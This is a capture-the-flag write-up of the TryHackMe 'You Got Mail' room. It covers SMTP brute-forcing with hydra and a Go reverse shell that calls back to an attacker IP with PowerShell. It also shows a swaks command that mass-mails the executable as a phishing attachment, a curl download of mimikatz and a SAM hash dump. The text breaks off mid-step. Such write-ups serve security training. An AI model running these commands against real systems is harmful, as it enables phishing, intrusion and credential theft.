You Got Mail

Test your recon and phishing skills in order to complete your objective. - by tryhackme

TryHackMe | Cyber Security TrainingTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

Target

We start with an Nmap scan and find some Windows-related ports, including 139/445 SMB, 3389 RDP, 5985 WinRM, some RPC ports >49000, as well as mail-related ports, 25,587 smtp, 110 pop3 and 143 imap.

nmap -sC -sV -p 25,110,135,139,143,445,587,3389,5985,47001,49664-49669,49671,49673 ygm.thm -T4 

brownbrick.co

In the assessment we have the authorization for a passive reconnaiceces on https://brownbrick.co/. On the Team page we'll find six mail adresses.

https://brownbrick.co/

We save those mails to a file for later use.

oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co

Shell as wrohit

The use of cewl here is not a passive reconnaissance as required in the scenario. However, this is included here for traceability and reproducibility. The password can be found directly on the index page.

cewl --lowercase https://brownbrick.co/ > passwords.txt

We brute force the SMTP login with the mail addresses found and the keywords of the page as passwords. We have a hit for lhedvig@brownbrick.co.

hydra -L emails.txt -P passwords.txt ygm.thm smtp -I

Now that we have access to a mail account, we can use it to send mails to the other mail addresses. Since the scenario is a phishing scenario, we will try it very simply with an executable.

For this we use a reverse shell written in Go, as we have already used in the AOC 24 Side Quest 4 https://0xb0b.gitbook.io/writeups/tryhackme/2024/advent-of-cyber-24-side-quest/t4-krampus-festival#payload-preparation.

0xb0b.go

package main

import (
    "net"
    "os/exec"
)

func main() {
    c, _ := net.Dial("tcp", "10.14.90.235:4445")
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}

This has to be compiled on a windows machine.

Next, we use swaks in combination with xargs to send the mail to each email address we found with the executable as an attachment. We choose something simple as the subject and body.

xargs -I {} swaks --to "{}" --from "lhedvig@brownbrick.co" --header "Subject: kickoff documents" \
--body "see attached file" --attach-type application/octet-stream --attach @0xb0b.exe \
--server ygm.thm --port 25 --timeout 20s --auth LOGIN \
--auth-user lhedvig@brownbrick.co --auth-password REDACTED < emails.txt

We have set up a listener (before sending the mails)...

... And shortly afterwards we receive a connection back. We are the user wrohit. The user flag can be found at the user's Desktop.

wrohit Password

The user wrohit is part of the Administrators group.

Furthermore there is no Windows Defender running:

Get-MpComputerStatus

This allows us to use Mimikatz, to dump the hashes using lsadump::sam.

curl http://10.14.90.235/mimikatz.exe -o mimikatz.exe

The hash of wrohit is crackable.

hMailServer Administrator Password

The password hash for the Administrators Dashboard of the hMailServer can be found at C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI

It's a MD5 hash which is crackable: